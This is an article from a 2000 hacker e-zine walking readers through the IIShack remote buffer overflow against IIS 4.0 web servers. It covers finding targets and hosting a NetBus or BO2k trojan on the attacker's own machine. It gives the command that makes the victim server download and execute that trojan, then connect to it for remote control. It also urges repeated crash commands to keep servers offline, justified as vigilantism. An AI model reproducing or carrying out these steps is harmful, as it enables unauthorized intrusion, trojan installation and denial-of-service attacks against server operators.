_________SWAT MAGAZINE ISSUE TWENTY SIX FEBRUARY 2000 __________ / \___________________________________________/ \ / Site Busting: Remote buffer overflows \ / by -=The Firestarter=- \ ----------------------------------------------------------------------- Ok time for an up-to-date way on site busting :o) although this method has been known to crash servers for anything up to six hours and not having the desired effect on the host server (i.e access to it) I have seen a few guides to using this exploit, each one varing in how it's done, so i have decided to describe the way in which i do it. So what is it? it's the IIShack expolit, yup a remote buffer overflow for IIS 4.0 (seems to work on early versions of IIS 5.0 as well). The source code for this exploit is in the exploit library: http://exploits.swateam.org in the NT section. You will need TASM32 to compile it, you can get that from: www.crackstore.com Ok in simple terms this exploit sends a load of data to the IIS webserver and causes it to crash, in the process it connects to another website and downloads a file, then executes it in the place of the IIS web server. Well it's something like that anyway! So what files can it execute? every lamers dream, TROJANS! yep these proggies actually have a use for the serious hacker! Now onto finding sites, well i tend to target kiddie porn sites with most of my attacks upon servers, so it doesn't matter if the attack fucks up and IIS crashes putting the website offline for hours on end. Anyway first off we'll find a target server, do that anyway that you wish no doubt you will want to crack different servers for different reasons, but anyway once you've found a server how do we check it for IIS 4.0 ? Well if any of you have CGI vulnrability scanning programs, most of them will tell you the web server software that is running, that is the method i use. But i have read that you can also telnet to port 80 of the target machine, type a few characters and whack return. read over the crap that you get streaming onto telnet and it should tell you that it's IIS 4.0 Or alteritivly you can just scan IP ranges of more or less any site and look for the defauly IIS 4 page that goes online when it's not being used for anything. Ok so it takes ages but if you board one day you'll probably find yourself doing it. Ok now onto the "hack", ok i set up IIS 5.0 on my box when i'm doing this for the simple reason that i know when it has worked without pissing about with netbus or anything like that. But you acn use more or less any web page, in my opinion you are probably best using your ISP's web space since some sites like Geocities and Tripod don't allow people to directly download files from them without getting the "click here to download" page. Also they don't allow executable to be uploaded, but like i said, i host the website on my computer for this one, i'll explain why in a moment. Right, dig out a copy of Netbus 1.7 or another similar trojan (i don't like BO2k much which is what most people use for this, if you like it, then use it or alterativly upload it once you've got in). A point worth making, most trojans don't run on NT, so you can forget about using Sub7. Use either Netbus or BO2k , i don't know of any others that will work. Set up the server so that it listens on port 80 and save it. Now upload the server to either your ISP's webspace or copy it into your c:\inetpub directory if you are running IIS on your box. Ok time to crack that server! or attempt to anyway. Fristly get the IP address of the server, you can do this by simply resolving it using any "hacker" utility that's worth having the name "hack" in it's title, I use essential net tools 2.01 myself. Ok so you have the IP address, we'll assume that it is 255.255.255.255 and your IP address is 255.255.255.222 Right the syntax for this expolit is run by command line, so either open up a DOS windows or go to start|run|command.com or start|run|cmd go into the directory where you have kept your compilied IIShack.exe file (there is instructions in the source code on how to compile it). then you will have to type: iishack So if we assume that you have the NetBus patch on your computers web server and it's called patch.exe you will enter this at the dos prompt: iishack 255.255.255.255 80 225.225.225.222/patch.exe whack enter again and it should say "Data Sent!" now watch the little monitor thigies in the corner of your screen, if they both flash on (i'm assuming that your not downloading anything and your connection should be idle) and you can see about 400k of data being sent from your box, then we can most likely assume that it is being downloaded. Or if the line: 02:02:24 225.225.225.225 GET /patch.exe 200 appears in your log file then assume that it worked. If you are using your ISP's webspace rather than your own box to host the trojan then you can simply put the URL (minus any http:// ) instead of your IP. Now once it's been downloaded from your box, fire up NetBus and enter the taget server's IP address, enter port 80 and then hit connect. Did you connect? oh you did, well done! now the box is yours to play with. But what if it goes wrong? well i have attempted the IISHack on a few kiddie porn sites and the only thing that has happened is that IIS has crashed on there server and it's not downloaded anything, heh no that i'm bothered since running it every six hours or so on it keeps it offline for a good while (re: most of the time). Carrying out this lethal DoS attack on such systems is a piece of piss, because no matter what you send to in in regards of the URL to the trojan, the server will go offline from anything between 5 minnutes to 6 hours or more. teehee simply send: iishack 255.255.255.255 127.0.0.1/r00tmyass or anything to that effect. then bingo, the server dies! i've tried all manner of things to get these servers to download trojans from other sites and such like, nothing seems to happen, all they do is crash. Oh well i suppose that it's nothing too bad when hitting kiddie porn sites.